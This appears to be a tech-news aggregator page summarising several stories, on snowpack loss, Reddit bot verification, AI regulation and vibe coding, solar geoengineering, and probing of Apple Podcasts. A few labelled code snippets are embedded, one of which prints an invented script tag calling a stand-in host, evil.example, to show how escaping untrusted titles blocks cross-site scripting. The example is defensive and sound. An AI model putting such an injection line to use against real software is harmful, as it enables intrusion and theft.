United States

Rapid Snow Melt-Off In American West Stuns Scientists (theguardian.com) 111

Scientists say extreme March heat caused an unusually rapid collapse of snowpack across the American West that's leaving major basins at record or near-record lows. "This year is on a whole other level," said Dr Russ Schumacher, a Colorado State University climatologist. "Seeing this year so far below any of the other years we have data for is very concerning." The Guardian reports: [...] The issue is extremely widespread. Data from a branch of the US Department of Agriculture (USDA), which logs averages based on levels between 1991 and 2020, shows states across the south-west and intermountain west with eye-popping lows. The Great Basin had only 16% of average on Monday and the lower Colorado region, which includes most of Arizona and parts of Nevada, was at 10%. The Rio Grande, which covers parts of New Mexico, Texas and Colorado, was at 8%. "This year has the potential of being way worse than any of the years we have analogues for in the past," Schumacher said.

Even with near-normal precipitation across most of the west, every major river basin across the region was grappling with snow drought when March began, according to federal analysts. Roughly 91% of stations reported below-median snow water equivalent, according to the last federal snow drought update compiled on March 8. Water managers and climate experts had been hopeful for a March miracle -- a strong cold storm that could set the region on the right track. Instead, a blistering heatwave unlike any recorded for this time of year baked the region and spurred a rapid melt-off. "March is often a big month for snowstorms," Schumacher said. "Instead of getting snow we would normally expect we got this unprecedented, way-off-the-scale warmth."

More than 1,500 monthly high temperature records were broken in March and hundreds more tied. The event was "likely among the most statistically anomalous extreme heat events ever observed in the American south-west," climate scientist Daniel Swain said in an analysis posted this week. "Beyond the conspicuous 'weirdness' of it all," Swain added, "the most consequential impact of our record-shattering March heat will likely be the decimation of the water year 2025-26 snowpack across nearly all of the American west." Calling the toll left by the heat "nothing short of shocking," Swain noted that California was tied for its worst mountain snowpack value on record. While the highest elevations are still coated in white, "lower slopes are now completely bare nearly statewide."

Privacy

Reddit Takes On Bots With 'Human Verification' Requirements (techcrunch.com) 75

Reddit is rolling out human-verification checks for accounts that show signs of bot-like behavior, while also labeling approved automated accounts that provide useful services. The social media company stressed that these checks will only happen if something appears "fishy," and that it is "not conducting sitewide human verification." TechCrunch reports: To identify potential bots, Reddit is using specialized tooling that looks at account-level signals and other factors -- like how quickly the account is attempting to write or post content. Using AI to write posts or comments, however, is not against its policies (though community moderators may set their own rules).
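Reddit has not published its detection tooling, so as a purely hypothetical illustration, here is what one account-level signal of the kind described above — how quickly an account attempts to post — might look like as a sliding-window rate check (all thresholds and numbers here are made up):

```python
from collections import deque

# Hypothetical sketch only -- Reddit has not disclosed its actual tooling.
# One simple account-level signal of the kind described: posting rate
# measured over a sliding time window.

class PostRateSignal:
    def __init__(self, window_seconds=60, flag_threshold=10):
        self.window = window_seconds
        self.threshold = flag_threshold  # posts per window considered "fishy"
        self.timestamps = deque()

    def record_post(self, now):
        """Record a post at time `now` (seconds); return True if the
        account's recent posting rate looks bot-like."""
        self.timestamps.append(now)
        # Drop events that have aged out of the window.
        while self.timestamps and now - self.timestamps[0] > self.window:
            self.timestamps.popleft()
        return len(self.timestamps) >= self.threshold

sig = PostRateSignal()
# Twelve posts in thirty seconds trips the illustrative threshold.
flags = [sig.record_post(t * 2.5) for t in range(12)]
print(flags[-1])  # True
```

A real system would combine many such signals (account age, content similarity, IP reputation) before triggering a human-verification challenge; a raw rate check alone would flag enthusiastic human posters too.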

To verify an account is human, Reddit will leverage third-party tools such as passkeys from Apple, Google, and YubiKey, as well as biometric services like Face ID or even Sam Altman's World ID -- or, in some countries, the use of government IDs. Reddit notes this last category may be required in some countries, such as the U.K. and Australia, and in some U.S. states because of local regulations on age verification, but it's not the company's preferred method.
"If we need to verify an account is human, we'll do it in a privacy-first way," Reddit co-founder and CEO Steve Huffman wrote in the announcement Wednesday. "Our aim is to confirm there is a person behind the account, not who that person is. The goal is to increase transparency of what is what on Reddit while preserving the anonymity that makes Reddit unique. You shouldn't have to sacrifice one for the other."
Operating Systems

System76 Comments On Recent Age Verification Laws (phoronix.com) 87

In a blog post on Thursday, System76 CEO Carl Richell criticized new state laws in California, Colorado, and New York that would require operating systems to verify users' ages and expose that information to apps, arguing the rules are easy for kids to bypass and ultimately undermine privacy and freedom more than they protect minors.

"System76's position is interesting given that they sell Linux-loaded desktops, workstations and laptops plus being an operating system vendor with their in-house Pop!_OS distribution and COSMIC desktop environment," adds Phoronix's Michael Larabel, noting that they're also based out of Colorado. Here's an excerpt from the post: "A parent that creates a non-admin account on a computer, sets the age for a child account they create, and hands the computer over is in no different state. The child can install a virtual machine, create an account on the virtual machine and set the age to 18 or over. It's a similar technique to installing a VPN to get around the Great Firewall of China (just consider that for a moment). Or the child can simply re-install the OS and not tell their parents. ... In the case of Colorado's and California's bills, effectiveness is lost. In the case of New York's bill, liberty is lost. In the case of centralized platforms, potential is lost. ... The challenges we face are neither technical nor legal. The only solution is to educate our children about life with digital abundance. Throwing them into the deep end when they're 16 or 18 is too late. It's a wonderful and weird world. Yes, there are dark corners. There always will be. We have to teach our children what to do when they encounter them and we have to trust them."

"We are accustomed to adding operating system features to comply with laws," writes Richell, in closing. "Accessibility features for ADA, and power efficiency settings for Energy Star regulations are two examples. We are a part of this world and we believe in the rule of law. We still hope these laws will be recognized for the folly they are and removed from the books or found unconstitutional."
United States

CIA Makes New Push To Recruit Chinese Military Officers as Informants (reuters.com) 72

An anonymous reader shares a report: Just weeks after a dramatic purge of China's top general, the CIA is moving to capitalize on any resulting discord with a new public video targeting potential informants in the Chinese military. The U.S. spy agency on Thursday rolled out the video depicting a disillusioned mid-level Chinese military officer, in the latest U.S. step in a campaign to ramp up human intelligence gathering on Washington's strategic rival.

It follows a similar effort last May, featuring fictional figures within China's ruling Communist Party, that provided detailed Chinese-language instructions on how to securely contact U.S. intelligence. CIA Director John Ratcliffe said in a statement that the agency's videos had reached many Chinese citizens and that it would continue offering Chinese government officials an "opportunity to work toward a brighter future together."

AI

What Go Programmers Think of AI (go.dev) 55

"Most Go developers are now using AI-powered development tools when seeking information (e.g., learning how to use a module) or toiling (e.g., writing repetitive blocks of similar code)." That's one of the conclusions Google's Go team drew from September's big survey of 5,379 Go developers.

But the survey also found that among Go developers using AI-powered tools, "their satisfaction with these tools is middling due, in part, to quality concerns." Our survey suggests bifurcated adoption — while a majority of respondents (53%) said they use such tools daily, there is also a large group (29%) who do not use these at all, or only used them a few times during the past month. We expected this to negatively correlate with age or development experience, but were unable to find strong evidence supporting this theory except for very new developers: respondents with less than one year of professional development experience (not specific to Go) did report more AI use than every other cohort, but this group only represented 2% of survey respondents. At this time, agentic use of AI-powered tools appears nascent among Go developers, with only 17% of respondents saying this is their primary way of using such tools, though a larger group (40%) are occasionally trying agentic modes of operation...

We also asked about overall satisfaction with AI-powered development tools. A majority (55%) reported being satisfied, but this was heavily weighted towards the "Somewhat satisfied" category (42%) vs. the "Very satisfied" group (13%)... [D]eveloper sentiment towards them remains much softer than towards more established tooling (among Go developers, at least). What is driving this lower rate of satisfaction? In a word: quality. We asked respondents to tell us something good they've accomplished with these tools, as well as something that didn't work out well. A majority said that creating non-functional code was their primary problem with AI developer tools (53%), with 30% lamenting that even working code was of poor quality.

The most frequently cited benefits, conversely, were generating unit tests, writing boilerplate code, enhanced autocompletion, refactoring, and documentation generation. These appear to be cases where code quality is perceived as less critical, tipping the balance in favor of letting AI take the first pass at a task. That said, respondents also told us the AI-generated code in these successful cases still required careful review (and often, corrections), as it can be buggy, insecure, or lack context... [One developer said reviewing AI-generated code was so mentally taxing that it "kills the productivity potential".]

Of all the tasks we asked about, "Writing code" was the most bifurcated, with 66% of respondents already or hoping to soon use AI for this, while 1/4 of respondents didn't want AI involved at all. Open-ended responses suggest developers primarily use this for toilsome, repetitive code, and continue to have concerns about the quality of AI-generated code.

Most respondents also said they "are not currently building AI-powered features into the Go software they work on (78%)," the surveyors report, "with 2/3 reporting that their software does not use AI functionality at all (66%)." This appears to be a decrease in production-related AI usage year-over-year; in 2024, 59% of respondents were not involved in AI feature work, while 39% indicated some level of involvement. That marks a shift of 14 points away from building AI-powered systems among survey respondents, and may reflect some natural pullback from the early hype around AI-powered applications: it's plausible that lots of folks tried to see what they could do with this technology during its initial rollout, with some proportion deciding against further exploration (at least at this time).

Among respondents who are building AI- or LLM-powered functionality, the most common use case was to create summaries of existing content (45%). Overall, however, there was little difference among most uses, with between 28% and 33% of respondents adding AI functionality to support classification, generation, solution identification, chatbots, and software development.

AI

South Korea Launches Landmark Laws To Regulate AI 7

An anonymous reader quotes a report from the Korea Herald: South Korea will begin enforcing its Artificial Intelligence Act on Thursday, becoming the first country to formally establish safety requirements for high-performance, or so-called frontier, AI systems -- a move that sets the country apart in the global regulatory landscape. According to the Ministry of Science and ICT, the new law is designed primarily to foster growth in the domestic AI sector, while also introducing baseline safeguards to address potential risks posed by increasingly powerful AI technologies. Officials described the inclusion of legal safety obligations for frontier AI as a world-first legislative step.

The act lays the groundwork for a national-level AI policy framework. It establishes a central decision-making body -- the Presidential Council on National Artificial Intelligence Strategy -- and creates a legal foundation for an AI Safety Institute that will oversee safety and trust-related assessments. The law also outlines wide-ranging support measures, including research and development, data infrastructure, talent training, startup assistance, and help with overseas expansion.

To reduce the initial burden on businesses, the government plans to implement a grace period of at least one year. During this time, it will not carry out fact-finding investigations or impose administrative sanctions. Instead, the focus will be on consultations and education. A dedicated AI Act support desk will help companies determine whether their systems fall within the law's scope and how to respond accordingly. Officials noted that the grace period may be extended depending on how international standards and market conditions evolve. The law applies to three areas only: high-impact AI, safety obligations for high-performance AI and transparency requirements for generative AI.

Enforcement under the Korean law is intentionally light. It does not impose criminal penalties. Instead, it prioritizes corrective orders for noncompliance, with fines -- capped at 30 million won ($20,300) -- issued only if those orders are ignored. This, the government says, reflects a compliance-oriented approach rather than a punitive one. Transparency obligations for generative AI largely align with those in the EU, but Korea applies them more narrowly. Content that could be mistaken for real, such as deepfake images, video or audio, must clearly disclose its AI-generated origin. For other types of AI-generated content, invisible labeling via metadata is allowed. Personal or noncommercial use of generative AI is excluded from regulation.
"This is not about boasting that we are the first in the world," said Kim Kyeong-man, deputy minister of the office of artificial intelligence policy at the ICT ministry. "We're approaching this from the most basic level of global consensus."

Korea's approach differs from the EU by defining "high-performance AI" using technical thresholds like cumulative training compute, rather than regulating based on how AI is used. As a result, Korea believes no current models meet the bar for regulation, while the EU is phasing in broader, use-based AI rules over several years.
Programming

'Just Because Linus Torvalds Vibe Codes Doesn't Mean It's a Good Idea' (theregister.com) 61

In an opinion piece for The Register, Steven J. Vaughan-Nichols argues that while "vibe coding" can be fun and occasionally useful for small, throwaway projects, it produces brittle, low-quality code that doesn't scale and ultimately burdens real developers with cleanup and maintenance. An anonymous reader shares an excerpt: Vibe coding got a big boost when everyone's favorite open source programmer, Linux's Linus Torvalds, said he'd been using Google's Antigravity AI coding tool on his toy program AudioNoise, which he uses to create "random digital audio effects" using his "random guitar pedal board design." This is not exactly Linux or even Git, his other famous project, in terms of the level of work. Still, many people reacted to Torvalds' vibe coding with "wow!" It's certainly noteworthy, but has the case for vibe coding really changed?

[...] It's fun, and for small projects, it's productive. However, today's programs are complex and call upon numerous frameworks and resources. Even if your vibe code works, how do you maintain it? Do you know what's going on inside the code? Chances are you don't. Besides, the LLM you used two weeks ago has been replaced with a new version. The exact same prompts that worked then yield different results today. Come to think of it, it's an LLM. The same prompts and the same LLM will give you different results every time you run it. This is asking for disaster.

Just ask Jason Lemkin. He was the guy who used the vibe coding platform Replit, which went "rogue during a code freeze, shut down, and deleted our entire database." Whoops! Yes, Replit and other dedicated vibe programming AIs, such as Cursor and Windsurf, are improving. I'm not at all sure, though, that they've been able to help with those fundamental problems of being fragile and still cannot scale successfully to the demands of production software. It's much worse than that. Just because a program runs doesn't mean it's good. As Ruth Suehle, President of the Apache Software Foundation, commented recently on LinkedIn, naive vibe coders "only know whether the output works or doesn't and don't have the skills to evaluate it past that. The potential results are horrifying."

Why? In another LinkedIn post, Craig McLuckie, co-founder and CEO of Stacklok, wrote: "Today, when we file something as 'good first issue' and in less than 24 hours get absolutely inundated with low-quality vibe-coded slop that takes time away from doing real work. This pattern of 'turning slop into quality code' through the review process hurts productivity and hurts morale." McLuckie continued: "Code volume is going up, but tensions rise as engineers do the fun work with AI, then push responsibilities onto their team to turn slop into production code through structured review."

Space

SpaceX Launches New NASA Telescope to Help JWST Study Exoplanets (livescience.com) 13

Last week a University of Arizona astronomy professor "watched anxiously...as an awe-inspiring SpaceX Falcon 9 rocket carried NASA's new exoplanet telescope, Pandora, into orbit."

In 2018 NASA had approached Daniel Apai to help build the telescope, which he says will "shatter a barrier — to understand and remove a source of noise in the data — that limits our ability to study small exoplanets in detail and search for life on them." Astronomers have a trick to study exoplanet atmospheres. By observing the planets as they orbit in front of their host stars, we can study starlight that filters through their atmospheres... But, starting from 2007, astronomers noted that starspots — cooler, active regions on the stars — may disturb the transit measurements. In 2018 and 2019, then-Ph.D. student Benjamin V. Rackham, astrophysicist Mark Giampapa and I published a series of studies showing how darker starspots and brighter, magnetically active stellar regions can seriously mislead exoplanet measurements. We dubbed this problem "the transit light source effect...."

In our papers — published three years before the 2021 launch of the James Webb Space Telescope — we predicted that the Webb cannot reach its full potential. We sounded the alarm bell... Pandora will do what Webb cannot: It will be able to patiently observe stars to understand how their complex atmospheres change.

By staring at a star for 24 hours with visible and infrared cameras, it will measure subtle changes in the star's brightness and colors. When active regions in the star rotate in and out of view, and starspots form, evolve and dissipate, Pandora will record them. While Webb very rarely returns to the same planet in the same instrument configuration and almost never monitors their host stars, Pandora will revisit its target stars 10 times over a year, spending over 200 hours on each of them.
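The starspot bias Apai describes can be sketched numerically. This is an illustrative back-of-envelope calculation, not Pandora's actual pipeline: it uses the standard contamination-factor form of the transit light source effect, and the spot coverage and brightness values below are made up for the example:

```python
# Illustrative sketch of the "transit light source effect" described above.
# If unocculted starspots cover a fraction f_spot of the visible stellar
# disk and are dimmer than the surrounding photosphere, the measured
# transit depth is inflated by a contamination factor
#   epsilon = 1 / (1 - f_spot * (1 - flux_ratio)).

def contaminated_depth(true_depth, f_spot, flux_ratio):
    """Apparent transit depth given unocculted starspots.

    true_depth -- (R_planet / R_star)**2, the geometric depth
    f_spot     -- fraction of the visible disk covered by spots
    flux_ratio -- spot flux / photosphere flux at this wavelength (< 1)
    """
    epsilon = 1.0 / (1.0 - f_spot * (1.0 - flux_ratio))
    return epsilon * true_depth

# Example: a small planet with a 0.1% geometric transit depth, 5% spot
# coverage, and spots half as bright as the photosphere.
true_depth = 0.001
observed = contaminated_depth(true_depth, f_spot=0.05, flux_ratio=0.5)
print(f"depth bias: {100 * (observed / true_depth - 1):.1f}%")  # 2.6%
```

Because the bias depends on wavelength (spots are relatively darker in the visible than the infrared), it can mimic or mask real atmospheric absorption features — which is why monitoring the star itself, as Pandora will, matters.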

It's the first space telescope "built specifically for detailed multi-color observations of starlight filtered through the atmospheres of exoplanets," reports the Arizona Daily Star, noting the University of Arizona will serve as mission control: [T]echnicians will operate Pandora in real time and monitor its telemetry and overall health under a contract with NASA... The spacecraft will undergo about a month of commissioning before beginning science operations, which are scheduled to last for a year...

Pandora was selected as part of NASA's Astrophysics Pioneers program, which was created in 2020 to foster compelling, relatively low-cost science missions using smaller, cheaper hardware and flight platforms, with a price cap of $20 million. By comparison, the Webb telescope — the largest and most powerful astronomical observatory ever sent into space — carries a price tag of about $10 billion.

Pandora is a joint mission between NASA and California's Lawrence Livermore National Laboratory.
AI

Rivian Goes Big On Autonomy, With Custom Silicon, Lidar, and a Hint At Robotaxis (techcrunch.com) 29

During the company's first "Autonomy & AI Day" event today, Rivian unveiled a major autonomy push featuring custom silicon, lidar, and a "large driving model." It also hinted at a potential entry into the self-driving ride-hail market, according to CEO RJ Scaringe. TechCrunch reports: Rivian said it will expand the hands-free version of its driver-assistance software to "over 3.5 million miles of roads across the USA and Canada" and will eventually expand beyond highways to surface streets (with clearly painted road lines). This expanded access will be available on the company's second-generation R1 trucks and SUVs. It's calling the expanded capabilities "Universal Hands-Free" and will launch in early 2026. Rivian says it will charge a one-time fee of $2,500 or $49.99 per month.

"What that means is you can get into the vehicle at your house, plug in the address to where you're going, and the vehicle will completely drive you there," Scaringe said Thursday, describing a point-to-point navigation feature. After that, Rivian plans to allow drivers to take their eyes off the road. "This gives you your time back. You can be on your phone, or reading a book, no longer needing to be actively involved in the operation of the vehicle." Rivian's driver assistance software won't stop there; the EV maker laid out plans on Thursday to enhance its capabilities all the way up to what it's calling "personal L4," a nod to the level set by the Society of Automotive Engineers that means a car can operate in a particular area with no human intervention.

After that, Scaringe hinted that Rivian will be looking at competing with the likes of Waymo. "While our initial focus will be on personally owned vehicles, which today represent a vast majority of the miles driven in the United States, this also enables us to pursue opportunities in the ride-share space," he said. To help accomplish these lofty goals, Rivian has been building a "large driving model" (think: an LLM but for real-world driving), part of a move, led by Tesla, away from a rules-based framework for developing autonomous vehicles. The company also showed off its own custom 5nm processor, which it says will be built in collaboration with both Arm and TSMC.

AI

AI Can Already Do the Work of 12% of America's Workforce, Researchers Find (msn.com) 59

An anonymous reader shared this report from CBS News: Artificial intelligence can do the work currently performed by nearly 12% of America's workforce, according to a recent study from the Massachusetts Institute of Technology. The researchers, relying on a metric called the "Iceberg Index" that measures a job's potential to be automated, conclude that AI already has the cognitive and technical capacity to handle a range of tasks in technology, finance, health care and professional services. The index simulated how more than 150 million U.S. workers across nearly 1,000 occupations interact and overlap with AI's abilities...

AI is also already doing some of the entry-level jobs that have historically been reserved for recent college graduates or relatively inexperienced workers, the report notes. "AI systems now generate more than a billion lines of code each day, prompting companies to restructure hiring pipelines and reduce demand for entry-level programmers," the researchers wrote. "These observable changes in technology occupations signal a broader reorganization of work that extends beyond software development."

"The study doesn't seek to shed light on how many workers AI may already have displaced or could supplant in the future," the article points out.

"To what extent such tools take over job functions performed by people depends on a number of factors, including individual businesses' strategy, societal acceptance and possible policy interventions, the researchers note."
Security

Someone Is Trying To 'Hack' People Through Apple Podcasts (404media.co) 9

Apple's Podcasts app on both iOS and Mac has been exhibiting strange behavior for months, spontaneously launching and presenting users with obscure religion, spirituality and education podcasts they never subscribed to -- and at least one of these podcasts contains a link attempting a cross-site scripting attack, 404 Media reports. Joseph Cox, a journalist at the outlet, documented the issue after repeatedly finding his Mac had launched the Podcasts app on its own, presenting bizarre podcasts with titles containing garbled code, external URLs to Spotify and Google Play, and in one case, what appears to be XSS attack code embedded directly in the podcast title itself.

Patrick Wardle, a macOS security expert and creator of Objective-See, confirmed he could replicate similar behavior: simply visiting a website can trigger the Podcasts app to open and load an attacker-chosen podcast without any user prompt or approval. Wardle said this creates "a very effective delivery mechanism" if a vulnerability exists in the Podcasts app, and the level of probing suggests adversaries are actively evaluating it as a potential target. The XSS-attempting podcast dates from around 2019. A recent review in the app asked "How does Apple allow this attempted XSS attack?"
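404 Media doesn't publish the payload it found, so as a generic illustration only: an XSS attempt of this kind works when an app interpolates attacker-controlled metadata, such as a podcast title, into HTML without escaping it. The malicious title and URL below are invented for the example; escaping the untrusted string neutralizes the attack:

```python
import html

# Generic illustration of a stored XSS vector: a podcast title that
# carries script. If rendered into HTML unescaped, the script executes
# in the viewer's context; html.escape() renders it as inert text.

malicious_title = '<script>fetch("https://evil.example/steal")</script>'

unsafe_html = f"<h1>{malicious_title}</h1>"             # script tag survives
safe_html = f"<h1>{html.escape(malicious_title)}</h1>"  # rendered as text

print("<script>" in safe_html)  # False
```

The same principle applies to any field an attacker controls (titles, descriptions, author names): escape on output, because the data store itself can't be trusted to be clean.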

Asked for comment five times by 404 Media, Apple did not respond.
Earth

'The Strange and Totally Real Plan to Blot Out the Sun and Reverse Global Warming' (politico.com) 117

In a 2023 pitch to investors, a "well-financed, highly credentialed" startup named Stardust aimed for a "gradual temperature reduction demonstration" in 2027, according to a massive new 9,600-word article from Politico. ("Annually dispersing ~1 million tons of sun-reflecting particles," says one slide. "Equivalent to ~1% extra cloud coverage.")

"Another page told potential investors Stardust had already run low-altitude experiments using 'test particles'," the article notes: [P]ublic records and interviews with more than three dozen scientists, investors, legal experts and others familiar with the company reveal an organization advancing rapidly to the brink of being able to press "go" on its planet-cooling plans. Meanwhile, Stardust is seeking U.S. government contracts and quietly building an influence machine in Washington to lobby lawmakers and officials in the Trump administration on the need for a regulatory framework that it says is necessary to gain public approval for full-scale deployment....

The presentation also included revenue projections and a series of opportunities for venture capitalists to recoup their investments. Stardust planned to sign "government contracts," said a slide with the company's logo next to an American flag, and consider a "potential acquisition" by 2028. By 2030, the deck foresaw a "large-scale demonstration" of Stardust's system. At that point, the company claimed it would already be bringing in $200 million per year from its government contracts and eyeing an initial public offering, if it hadn't been sold already.

The article notes that for "a widening circle of researchers and government officials, Stardust's perceived failures to be transparent about its work and technology have triggered a larger conversation about what kind of international governance framework will be needed to regulate a new generation of climate technologies." (Since currently Stardust and its backers "have no legal obligations to adhere to strenuous safety principles or to submit themselves to the public view.")

In October Politico spoke to Stardust CEO Yanai Yedvab, a former nuclear physicist who was once deputy chief scientist at the Israeli Atomic Energy Commission. Stardust "was ready to announce the $60 million it had raised from 13 new investors," the article points out, "far larger than any previous investment in solar geoengineering." [Yedvab] was delighted, he said, not by the money, but by what it meant for the project. "We are, like, few years away from having the technology ready to a level that decisions can be taken" — meaning that deployment was still on track to potentially begin on the timeline laid out in the 2023 pitch deck. The money raised was enough to start "outdoor contained experiments" as soon as April, Yedvab said. These would test how their particles performed inside a plane flying at stratospheric heights, some 11 miles above the Earth's surface... The key thing, he insisted, was the particle was "safe." It would not damage the ozone layer and, when the particles fall back to Earth, they could be absorbed back into the biosphere, he said. Though it's impossible to know this is true until the company releases its formula. Yedvab said this round of testing would make Stardust's technology ready to begin a staged process of full-scale, global deployment before the decade is over — as long as the company can secure a government client. To start, they would only try to stabilize global temperatures — in other words, fly enough particles into the sky to counteract the steady rise in greenhouse gas levels — which would initially take a fleet of 100 planes.
This raises the question: should the world attempt solar geoengineering? That the global temperature would drop is not in question. Britain's Royal Society... said in a report issued in early November that there was little doubt it would be effective. They did not endorse its use, but said that, given the growing interest in this field, there was good reason to be better informed about the side effects... [T]hat doesn't mean it can't have broad benefits when weighed against deleterious climate change, according to Ben Kravitz, a professor of earth and atmospheric sciences at Indiana University who has closely studied the potential effects of solar geoengineering. "There would be some winners and some losers. But in general, some amount of ... stratospheric aerosol injection would likely benefit a whole lot of people, probably most people," he said. Other scientists are far more cautious. The Royal Society report listed a range of potential negative side effects that climate models had displayed, including drought in sub-Saharan Africa. In accompanying documents, it also warned of more intense hurricanes in the North Atlantic and winter droughts in the Mediterranean. But the picture remains partial, meaning there is no way yet to have an informed debate over how useful or not solar geoengineering could be...

And then there's the problem of trying to stop. Because an abrupt end to geoengineering, with all the carbon still in the atmosphere, would cause the temperature to soar suddenly upward with unknown, but likely disastrous, effects... Once the technology is deployed, the entire world would be dependent on it for however long it takes to reduce the trillion or more tons of excess carbon dioxide in the atmosphere to a safe level...

Stardust claims to have solved many technical and safety challenges, especially related to the environmental impacts of the particle, which they say would not harm nature or people. But researchers say the company's current lack of transparency makes it impossible to trust.

Thanks to long-time Slashdot reader fjo3 for sharing the article.

United Kingdom

UK Unveils Plan To Cut Animal Testing Through Greater Use of AI (theguardian.com) 5

Animal testing in science would be phased out faster under a new plan to increase the use of artificial intelligence and 3D bioprinted human tissues, a UK minister has said. The Guardian: The roadmap unveiled by the science minister, Patrick Vallance, backs replacing certain animal tests that are still used where necessary to determine the safety of products such as life-saving vaccines and the impact pesticides have on living beings and the environment. The strategy says phasing out the use of animals in science can only happen when reliable and effective alternative methods with the same level of safety for human exposure can replace them.

The government said new funding for researchers and streamlined regulation would help develop methods such as organ-on-a-chip systems -- tiny devices that mimic how human organs work using real human cells. Greater use of AI to analyse vast amounts of data about molecules and predict whether new medicines will be safe and work well on humans would be deployed, while 3D bioprinted tissues could create realistic human tissue samples, from skin to liver, for testing.

Other plans under the strategy include an end to regulatory testing on animals to assess the potential for skin and eye irritation and skin sensitisation by the end of 2026. By 2027, researchers are expected under the strategy to end tests of the strength of botox on mice, while by 2030 pharmacokinetic studies -- which track how a drug moves through the body over time -- on dogs and non-human primates will be reduced.

Security

Danish Authorities In Rush To Close Security Loophole In Chinese Electric Buses (theguardian.com) 43

An anonymous reader quotes a report from the Guardian: Authorities in Denmark are urgently studying how to close an apparent security loophole in hundreds of Chinese-made electric buses that enables them to be remotely deactivated. The investigation comes after transport authorities in Norway, where the Yutong buses are also in service, found that the Chinese supplier had remote access for software updates and diagnostics to the vehicles' control systems -- which could be exploited to affect buses while in transit.

Amid concerns over potential security risks, the Norwegian public transport authority Ruter decided to test two electric buses in an isolated environment. Bernt Reitan Jenssen, Ruter's chief executive, said: "The testing revealed risks that we are now taking measures against. National and local authorities have been informed and must assist with additional measures at a national level." Their investigations found that remote deactivation could be prevented by removing the buses' sim cards, but they decided against this because it would also disconnect the bus from other systems.

Ruter said it planned to bring in stricter security requirements for future procurements. Jenssen said it must act before the arrival of the next generation of buses, which could be even "more integrated and harder to secure." Movia, Denmark's largest public transport company, has 469 Chinese electric buses in operation -- 262 of which were manufactured by Yutong. Jeppe Gaard, Movia's chief operating officer, said he was made aware of the loophole last week. "This is not a Chinese bus problem," he said. "It is a problem for all types of vehicles and devices with Chinese electronics built in."

Earth

Are Supershear Earthquakes Even More Dangerous Than We Thought? (yahoo.com) 4

Long-time Slashdot reader Bruce66423 shared this article from the Los Angeles Times: Scientists have increasingly observed that the rupture of a fault during an earthquake can outpace another type of damaging seismic wave, theoretically generating energy on the level of a sonic boom. These shock waves — created during "supershear" earthquakes — can intensify both the side-to-side and up-and-down shaking along an affected fault area, scientists at USC, Caltech and the University of Illinois Urbana-Champaign wrote in a recent opinion article for the journal Seismological Research Letters. Although not everyone agrees that supershear earthquakes are inherently more destructive than other types, the potential implications are massive and need to be accounted for in seismic forecasts, the scientists contend... In just the last 15 years, 14 of 39 large strike-slip earthquakes have exhibited features of supershear ruptures, the opinion article said...

In California, supershear earthquakes would be expected on the straightest of "strike-slip" faults — in which one block of earth slides past another — like the San Andreas... There are a number of communities directly on top of the San Andreas fault. Among them are Coachella, Indio, Cathedral City, Palm Springs, Desert Hot Springs, Banning, Yucaipa, Highland, San Bernardino, Wrightwood, Palmdale, Gorman, Frazier Park, San Juan Bautista, Palo Alto, Portola Valley, Woodside, San Bruno, South San Francisco, Pacifica, Daly City and Bodega Bay.
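The defining condition the article describes, a rupture front outrunning the shear (S) wave, can be sketched numerically. This is an illustrative toy, not from the article: the 3.5 km/s S-wave speed is a typical crustal value, and `rupture_regime` is a hypothetical helper name.

```python
import math

CRUSTAL_S_WAVE = 3.5  # km/s; typical shear-wave speed in the crust (illustrative)

def rupture_regime(rupture_speed_km_s, s_wave=CRUSTAL_S_WAVE):
    """Classify a rupture by speed. When the rupture front outruns the
    S-wave (supershear), its wavefronts pile up into a Mach cone whose
    half-angle satisfies sin(theta) = v_s / v_rupture."""
    if rupture_speed_km_s <= s_wave:
        return "sub-shear", None
    theta = math.degrees(math.asin(s_wave / rupture_speed_km_s))
    return "supershear", theta

print(rupture_regime(2.8))  # slower than the S-wave: sub-shear
print(rupture_regime(5.0))  # supershear, with a Mach cone
```

The Mach-cone geometry is what concentrates shaking along the fault, the effect the opinion article argues seismic forecasts should account for.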

One earthquake scientist suggests building codes need to be more strict, according to the article.

But it also cites a U.S. Geological Survey research geophysicist who isn't convinced by the new opinion article. "I don't think we know yet whether supershear ruptures really are more destructive."

Education

The School That Replaces Teachers With AI (joincolossus.com) 124

Long-time Slashdot reader theodp writes: CBS News has a TL;DR video report, but Jeremy Stern's earlier epic Class Dismissed [at joincolossus.com] offers a deep dive into Alpha School, "the teacherless, homeworkless, K-12 private school in Austin, Texas, where students have been testing in the top 0.1% nationally by self-directing coursework with AI tutoring apps for two hours a day.

Alpha students are incentivized to complete coursework to "mastery-level" (i.e., scoring over 90%) in only two hours via a mix of various material and immaterial rewards, including the right to spend the other four hours of the school day in 'workshops,' learning things like how to run an Airbnb or food truck, manage a brokerage account or Broadway production, or build a business or drone."

Founder MacKenzie Larson's dream that "kids must love school so much they don't want to go on vacation" drew the attention of — and investments of money and time from — mysterious tech billionaire Joe Liemandt, who sent his own kids to Larson's school and now aims to bring the experience to the rest of the world. "When GenAI hit in 2022," Liemandt said, "I took a billion dollars out of my software company. I said, 'Okay, we're going to be able to take MacKenzie's 2x in 2 hours groundwork and get it out to a billion kids.' It's going to cost more than that, but I could start to figure it out. It's going to happen. There's going to be a tablet that costs less than $1,000 that is going to teach every kid on this planet everything they need to know in two hours a day and they're going to love it.

"I really do think we can transform education for everybody in the world. So that's my next 20 years. I literally wake up now and I'm like, I'm the luckiest guy in the world. I will work 7 by 24 for the next 20 years to fricking do this. The greatest 20 years of my life are right ahead of me. I don't think I'm going to lose. We're going to win."

Of course, Stern writes at joincolossus.com, there will be questions about this model of schooling, but asks: "Suppose that from kindergarten through 12th grade, your child's teachers were, in essence, stacks of machines. Suppose those machines unlocked more of your child's academic potential than you knew was possible, and made them love school. Suppose the schooling they loved involved vision monitoring and personal data capture. Suppose that surveillance architecture enabled them to outperform your wildest expectations on standardized tests, and in turn gave them self-confidence and self-esteem, and made their own innate potential seem limitless.... Suppose poor kids had a reason to believe and a way to show they're just as academically capable as rich kids, and that every student on Earth could test in what we now consider the top 10%. Suppose it allowed them to spend two-thirds of their school day on their own interests and passions. Suppose your child's deep love of school minted a new class of education billionaires.

"If you shrink from such a future, by which principle would you justify stifling it?"

Cellphones

Thwarted Plot To Cripple Cell Service In NY Was Bigger Than First Thought (go.com) 47

